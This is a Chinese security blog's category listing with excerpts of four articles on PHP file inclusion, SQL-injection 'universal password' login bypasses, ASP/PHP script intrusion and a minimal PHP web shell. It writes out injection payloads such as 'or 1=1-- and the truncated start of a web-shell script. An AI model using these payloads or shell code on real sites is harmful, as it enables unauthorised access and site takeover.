安全
文章平均质量分 77
abu_sec
这个作者很懒,什么都没留下…
展开
-
PHP文件包含漏洞原理分析和利用方法
本文章简单摘要:一、涉及到的危险函数〔include(),require()和include_once(),require_once()〕include()&&require()语句:包括并运行指定文件。这两种结构除了在如何处理失败之外完全一样。include()产生一个警告而require()则导致一个致命错误。换句话说,如果你想在遇到丢失文件时停止处理页面就用require()。include转载 2013-05-13 09:04:36 · 511 阅读 · 0 评论 -
网站万能密码收集与php万能密码详解
所谓万能密码就是绕过登录验证直接进入管理员后台的密码,这种类型的密码可以通用到很多存在此漏洞的网站所以称之为万能。自己也有过收集,别人总结的我又添加了几个asp aspx万能密码1:”or “a”=”a2: ‘)or(‘a’='a3:or 1=1–4:’or 1=1–5:a’or’ 1=1–6:”or 1=1–7:’or’a'=’a8:”or”=转载 2013-05-13 09:39:11 · 2330 阅读 · 0 评论 -
渗透笔记之脚本入侵(ASP、PHP)
简单判定有无漏洞:粗略型:'1. 数字型:and 1=1 and 1=22.字符型:' and '1'='1 ' and '1'='23.搜索型:%' and 1=1 and '%'='% 或者 %' and 1=2 and '%'='%(PS:第三个大家可能不常用,他一般在ASP脚本中一般写成:keyword=request(”ke转载 2013-05-13 08:58:35 · 890 阅读 · 0 评论 -
全世界最小的php网页木马一枚 附PHP木马的防范方法
php网页木马代码,大家可以看下自己的网站里面是不是有这样的代码,注意网站安全用mcafee限制w3wp.exe生成php或者asp文件。并在php.ini中设置一下。php网页木马<?php header("content-Type: text/html; charset=gb2312"); if(get_magic_quotes_gpc()) foreach($_POST as翻译 2013-05-14 08:57:24 · 1737 阅读 · 0 评论